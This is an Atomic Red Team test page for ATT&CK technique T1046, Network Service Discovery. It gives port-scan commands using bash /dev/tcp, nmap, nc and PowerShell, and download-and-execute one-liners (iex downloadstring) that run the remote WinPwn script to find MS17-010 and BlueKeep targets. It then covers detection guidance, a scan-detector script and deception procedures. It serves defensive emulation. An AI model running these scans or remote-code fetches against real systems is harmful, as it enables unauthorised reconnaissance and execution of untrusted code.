# T1046 - Network Service Discovery
Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to an on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host's registered services on the network. For example, adversaries can use an mDNS query (such as `dns-sd -B _ssh._tcp .`) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
## Atomic Tests

### Atomic Test #1 - Port Scan

Scan ports to check for listening ports.

Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.

**Supported Platforms:** linux, macos

#### Attack Commands: Run with `bash`

```bash
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/192.168.1.1/$port) && echo port $port is open ; done
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 1
```
### Atomic Test #2 - Port Scan Nmap

Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

**Supported Platforms:** linux, macos

**Elevation Required** (e.g. root or admin)

#### Dependencies: Run with `sh`

##### Description: Check if nmap command exists on the machine

##### Check Prereq Commands:

```sh
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
```

##### Get Prereq Commands:

```sh
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)
```

##### Description: Check if nc command exists on the machine

##### Check Prereq Commands:

```sh
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
```

##### Get Prereq Commands:

```sh
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)
```

##### Description: Check if telnet command exists on the machine

##### Check Prereq Commands:

```sh
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
```

##### Get Prereq Commands:

```sh
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 2 -GetPreReqs
```

#### Attack Commands: Run with `sh`

```sh
sudo nmap -sS 192.168.1.0/24 -p 80
telnet 192.168.1.1 80
nc -nv 192.168.1.1 80
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 2
```
### Atomic Test #3 - Port Scan NMap for Windows

Scan ports to check for listening ports for the local host 127.0.0.1

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Dependencies: Run with `powershell`

##### Description: NMap must be installed

##### Check Prereq Commands:

```powershell
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" https://nmap.org/dist/nmap-7.80-setup.exe
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" /S
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 3 -GetPreReqs
```

#### Attack Commands: Run with `powershell`

```powershell
nmap 127.0.0.1
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 3
```
### Atomic Test #4 - Port Scan using python

Scan ports to check for listening ports with python

**Supported Platforms:** windows

#### Dependencies: Run with `powershell`

##### Description: Check if python exists on the machine

##### Check Prereq Commands:

```powershell
if (python --version) {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
echo "Python 3 must be installed manually"
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 4 -GetPreReqs
```

#### Attack Commands: Run with `powershell`

```powershell
python "PathToAtomicsFolder\T1046\src\T1046.py" -i 127.0.0.1
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 4
```
### Atomic Test #5 - WinPwn - spoolvulnscan

Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn

**Supported Platforms:** windows

#### Attack Commands: Run with `powershell`

```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 5
```

### Atomic Test #6 - WinPwn - MS17-10

Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn

**Supported Platforms:** windows

#### Attack Commands: Run with `powershell`

```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 6
```

### Atomic Test #7 - WinPwn - bluekeep

Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).

**Supported Platforms:** windows

#### Attack Commands: Run with `powershell`

```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 7
```

### Atomic Test #8 - WinPwn - fruit

Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn

**Supported Platforms:** windows

#### Attack Commands: Run with `powershell`

```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 8
```
### Atomic Test #9 - Network Service Discovery for Containers

Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.

**Supported Platforms:** containers

#### Dependencies: Run with `sh`

##### Description: Verify docker is installed.

##### Check Prereq Commands:

```sh
which docker
```

##### Get Prereq Commands:

```sh
# POSIX sh: use "=" (not "==") for string comparison and $(...) for command substitution
if [ "" = "$(which docker)" ]; then echo "Docker Not Found"; if [ -n "$(which apt-get)" ]; then sudo apt-get -y install docker ; elif [ -n "$(which yum)" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
```

##### Description: Verify docker service is running.

##### Check Prereq Commands:

```sh
sudo systemctl status docker --no-pager
```

##### Get Prereq Commands:

```sh
sudo systemctl start docker
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 9 -GetPreReqs
```

#### Attack Commands: Run with `sh`

```sh
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
docker run --name t1046_container -d -t t1046
docker exec t1046_container ./test.sh
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 9
```

#### Cleanup Commands:

```sh
docker stop t1046_container
docker rmi -f t1046
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 9 -Cleanup
```
### Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell

Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.

The connection attempts use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.

**Supported Platforms:** windows

#### Attack Commands: Run with `powershell`

```powershell
$ipAddr = ""
if ($ipAddr -eq "") {
    # Assumes the "primary" interface is shown at the top
    $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
    Write-Host "[i] Using Interface $interface"
    $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = 445, 3389
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
    foreach ($port in $ports) {
        try {
            $tcp = New-Object Net.Sockets.TcpClient
            # Wait at most 200 ms per connection attempt
            $tcp.ConnectAsync($ip, $port).Wait(200) | Out-Null
        } catch {}
        if ($tcp.Connected) {
            $tcp.Close()
            Write-Host "Port $port is open on $ip"
        }
    }
}
```

```powershell
Invoke-AtomicTest T1046 -TestNumbers 10
```
## Detection
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.
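As an added defender-side example (not part of the Atomic Red Team page or its tests), the following Python script applies the flow-inspection advice above to constructed connection records: it flags a source that probes many ports on one host within a window, as Test #1 would, or one port across many hosts, as Test #10's 445/3389 sweep would. The record layout, window size and thresholds are assumptions chosen for the example.

```python
"""Port-scan detection over connection records (added example, not code from
the Atomic Red Team page). Flags a source touching many ports on one host in a
window (vertical scan, cf. Test #1) or one port on many hosts (horizontal
sweep, cf. Test #10). Log layout and thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW_SECONDS = 60    # fixed aggregation bucket (assumed); a scan straddling
                       # a bucket boundary is split between two buckets
VERTICAL_PORTS = 20    # distinct dst ports on one host -> vertical scan
HORIZONTAL_HOSTS = 20  # distinct hosts on one dst port -> horizontal sweep

def parse_line(line):
    """Parse 'ISO-timestamp src dst dport' (constructed record format)."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)

def detect_scans(lines):
    """Return a sorted list of (kind, src, target, count) alerts."""
    ports_by_host = defaultdict(set)   # (window, src, dst)   -> {dport}
    hosts_by_port = defaultdict(set)   # (window, src, dport) -> {dst}
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport = parse_line(line)
        window = int(ts.timestamp()) // WINDOW_SECONDS
        ports_by_host[(window, src, dst)].add(dport)
        hosts_by_port[(window, src, dport)].add(dst)
    alerts = set()
    for (_, src, dst), ports in ports_by_host.items():
        if len(ports) >= VERTICAL_PORTS:
            alerts.add(("vertical_scan", src, dst, len(ports)))
    for (_, src, dport), hosts in hosts_by_port.items():
        if len(hosts) >= HORIZONTAL_HOSTS:
            alerts.add(("horizontal_sweep", src, f"port {dport}", len(hosts)))
    return sorted(alerts)

def constructed_log():
    """Constructed sample: one vertical scan, one /24 sweep, benign noise."""
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    at = lambda s: (t0 + timedelta(seconds=s)).isoformat()
    lines = [f"{at(i)} 10.0.0.5 192.168.1.1 {i + 1}" for i in range(30)]   # ports 1-30
    lines += [f"{at(i)} 10.0.0.9 192.168.1.{i + 1} 445" for i in range(25)]  # 25 hosts
    lines += [f"{at(i * 10)} 10.0.0.7 192.168.1.10 443" for i in range(5)]  # benign
    return lines

if __name__ == "__main__":
    for alert in detect_scans(constructed_log()):
        print(alert)
```

Thresholds should be tuned against a baseline of the environment's legitimate scanners so that authorised vulnerability scanning can be allow-listed rather than alerted on.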
## Shield Active Defense

### Software Manipulation

Make changes to a system's software properties and functions to achieve a desired effect.

Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.

### Opportunity

There is an opportunity for the defender to observe the adversary and control what they can see, what effects they can have, and/or what data they can access.

### Use Case

A defender can change the output of recon commands to hide simulation elements they don't want attacked and present simulation elements they want the adversary to engage with.

### Procedures

- Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.
- Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.
- Alter the output of an adversary's profiling commands to make newly-built systems look like the operating system was installed months earlier.
- Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.